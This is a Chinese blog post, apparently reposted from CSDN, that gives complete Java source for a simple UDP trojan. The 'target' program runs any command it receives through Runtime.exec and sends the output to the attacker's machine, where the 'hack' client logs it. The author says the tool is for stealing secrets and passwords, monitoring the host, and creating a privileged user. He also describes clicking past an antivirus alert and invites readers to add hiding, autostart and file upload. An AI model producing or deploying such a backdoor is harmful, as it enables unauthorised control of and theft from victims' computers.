欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

Java写的一个简易木马(仅供自娱自乐)(基于UDP实现版)

程序员文章站 2022-03-27 12:54:03
闲来无事,想着利用套接字和exec()这个方法调用cmd命令并将结果通过套接字反馈到黑客电脑上,将结果写入一个文件便于以后分析。(比如窃取目标机密信息、密码、监控对方主机、查看对方CPU、内存信息,另外就是新建用户并提权便于黑客后面登陆)开发环境:IntelljIDEA 2020+JDK1.8Win10主机(ip:192.168.1.106)和Win7虚拟机(ip:192.168.1.107)上测试代码如下:黑客端:(套接字的客户端)package UDP;import java.io.IOEx...

闲来无事,想着利用套接字和exec()这个方法调用cmd命令并将结果通过套接字反馈到黑客电脑上,将结果写入一个文件便于以后分析。(比如窃取目标机密信息、密码、监控对方主机、查看对方CPU、内存信息,另外就是新建用户并提权便于黑客后面登陆)
开发环境:IntelljIDEA 2020+JDK1.8
Win10主机(ip:192.168.1.106)和Win7虚拟机(ip:192.168.1.107)上测试
代码如下:
黑客端:(套接字的客户端)

package UDP;
import java.io.IOException;
import java.net.DatagramPacket;
import java.net.DatagramSocket;
import java.net.InetAddress;
import java.util.Scanner;
import java.io.*;
public class hack {
    public static void main(String[] args) throws IOException {
        while(true) {
            DatagramSocket ds = new DatagramSocket();
            Scanner input=new Scanner(System.in);
            System.out.println("请输入要执行的命令");
            String str = input.nextLine();
            byte[] bytes = str.getBytes();
            InetAddress ip = InetAddress.getByName("192.168.1.107");
            DatagramPacket dp = new DatagramPacket(bytes, bytes.length, ip, 9999);
            ds.send(dp);
            byte[] bytes2=new byte[4096];
            ds.close();
            DatagramSocket ds2=new DatagramSocket(8888);
            DatagramPacket dp2=new DatagramPacket(bytes2,bytes2.length);
            ds2.receive(dp2);
            byte[] bytes3=dp2.getData();
            int leng=dp2.getLength();
            File f=new File("D:\\*\\infomation\\infos");
            if(!f.exists()){
                f.createNewFile();
            }
            String info=new String(bytes3,0,leng,"gbk");
            FileWriter fw=new FileWriter(f,true);
            BufferedWriter bw=new BufferedWriter(fw);
            bw.write(info);
            bw.flush();
            bw.close();
            ds2.close();
        }
    }
}

被劫持主机(套接字服务端):

package UDP;
import java.io.IOException;
import java.io.InputStream;
import java.net.DatagramPacket;
import java.net.DatagramSocket;
import java.net.InetAddress;
public class target {
    public static void main(String[] args) throws  IOException {
        while(true) {
            DatagramSocket ds = new DatagramSocket(9999);
            byte[] bytes = new byte[1024];
            DatagramPacket dp = new DatagramPacket(bytes, bytes.length);
            ds.receive(dp);
            byte[] bytes2 = dp.getData();
            int leng = dp.getLength();
            String command=new String(bytes2, 0, leng);
            Runtime rt=Runtime.getRuntime();
            Process pr=rt.exec(command);
            InputStream is=pr.getInputStream();
            byte[] bytes3=new byte[4096];
            while(is.read(bytes3,0,bytes3.length)!=-1){

            }
            ds.close();
            DatagramSocket ds2=new DatagramSocket();
            InetAddress ip=InetAddress.getByName("192.168.1.106");
           DatagramPacket dp2=new DatagramPacket(bytes3,bytes.length,ip,8888);
           ds2.send(dp2);
         ds2.close();
        }
    }
}

测试结果:
Java写的一个简易木马(仅供自娱自乐)(基于UDP实现版)
Java写的一个简易木马(仅供自娱自乐)(基于UDP实现版)
通过以上命令得到的数据也返回到了infos文件里面了。
Java写的一个简易木马(仅供自娱自乐)(基于UDP实现版)
更重要的,通过命令建立的hack用户并提权也成功在虚拟机上建立了。
Java写的一个简易木马(仅供自娱自乐)(基于UDP实现版)
虚拟机上的360还是比较灵的,刚输完命令运行马上报警:
Java写的一个简易木马(仅供自娱自乐)(基于UDP实现版)
Java写的一个简易木马(仅供自娱自乐)(基于UDP实现版)
点允许即可。
当然,这只是很Low很Low的一个木马,初具雏形而已。如何隐藏、定时启动、自动上传文件、修改注册表等等都未完成,感兴趣的朋友可以下去自行补充。。。。。

本文地址:https://blog.csdn.net/weixin_47034674/article/details/110205544

相关标签: Java 安全